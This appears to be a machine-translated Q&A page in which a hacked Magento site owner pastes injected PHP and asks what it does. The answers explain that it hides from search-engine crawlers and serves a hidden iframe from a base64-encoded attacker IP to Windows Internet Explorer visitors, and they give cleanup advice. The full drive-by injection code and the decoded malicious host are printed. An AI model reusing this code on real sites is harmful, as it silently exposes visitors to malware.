Intereting Posts

PHP Web Application (Magento) взломан; Что делает этот код хакера?

Я был просто взломан на моей установке Magento 1.3.2.4. Можете ли вы сказать мне, что является целью этого кода?

Также, как остановить это и как обнаружить уязвимость?

спасибо

function net_match ( $network , $ip ) { $ip_arr = explode ( '/' , $network ); $network_long = ip2long ( $ip_arr [ 0 ]); $x = ip2long ( $ip_arr [ 1 ]); $mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]); $ip_long = ip2long ( $ip ); return ( $ip_long & $mask ) == ( $network_long & $mask ); } $ip=$_SERVER['REMOTE_ADDR']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $user_agent = $_SERVER["HTTP_USER_AGENT"]; $IP = $_SERVER['REMOTE_ADDR'].".log"; @mkdir('/tmp/Location/'); $dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw'); if(!file_exists("/tmp/Location/{$IP}")) { if( net_match('64.233.160.0/19',$ip)==0 && net_match('66.102.0.0/20',$ip)==0 && net_match('66.249.64.0/19',$ip)==0 && net_match('72.14.192.0/18',$ip)==0 && net_match('74.125.0.0/16',$ip)==0 && net_match('89.207.224.0/24',$ip)==0 && net_match('193.142.125.0/24',$ip)==0 && net_match('194.110.194.0/24',$ip)==0 && net_match('209.85.128.0/17',$ip)==0 && net_match('216.239.32.0/19',$ip)==0 && net_match('128.111.0.0/16',$ip)==0 && net_match('67.217.0.0/16',$ip)==0 && net_match('188.93.0.0/16',$ip)==0 ) { if(strpos($user_agent, "Windows") !== false) { if (preg_match("/MSIE 6.0/", $user_agent) OR preg_match("/MSIE 7.0/", $user_agent) OR preg_match("/MSIE 8.0/", $user_agent) ) { echo '<iframe frameborder=0 src="'.$dfjgkbl.'" width=1 height=1 scrolling=no></iframe>'; touch ("/tmp/Location/{$IP}"); }}}} 

Solutions Collecting From Web of "PHP Web Application (Magento) взломан; Что делает этот код хакера?"

Он создает iframe, который направляет людей на другой сайт. Переменная dfjgkbl содержит кодировку base64 URL-адреса; есть онлайн-декодеры base64, если вы хотите знать, что это такое. Я не буду вставлять его здесь, потому что URL-адрес, вероятно, содержит вирус Windows, основанный на остальной части вашего кода.

Просто дружеский совет, если вы используете FileZilla в качестве агента FTP, он сохраняет сохраненные пароли в XML-файле, на вашем компьютере может быть вирус, который может подключиться к FileZilla на ваш сервер и записать его в ваши файлы. Также проверьте свою CPanel и найдите учетные записи FTP, которые не созданы вами. Это может быть не так, просто проверьте в любом случае.

У меня также была аналогичная проблема с Total Commander … Вирус использовал учетную запись TC FTP и полностью изменил мой сайт (Joomla CMS) и добавил похожий вредоносный код почти в каждый файл php.

 $dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw'); 

идет:

НЕ ЩЕЛКНИТЕ, ЧТО (это ССЫЛКА ХАКЕРА) >>>> 129.121.38.102 / Главная / индекс. PHP

Хакер создает журнал всего, что происходит на вашем сайте.

Сначала обновите свой Magento, на данный момент это похоже на очень старую версию.

Ваш взломанный код – это общий код вирусов php, который мы видим каждый раз, это автоматический вирус, который отправляется с вашего компьютера на сервер или с сервера-сервера

также вы можете использовать бесплатный плагин, например: magefirewall для защиты вашего пурпурного.

PS Im один из разработчиков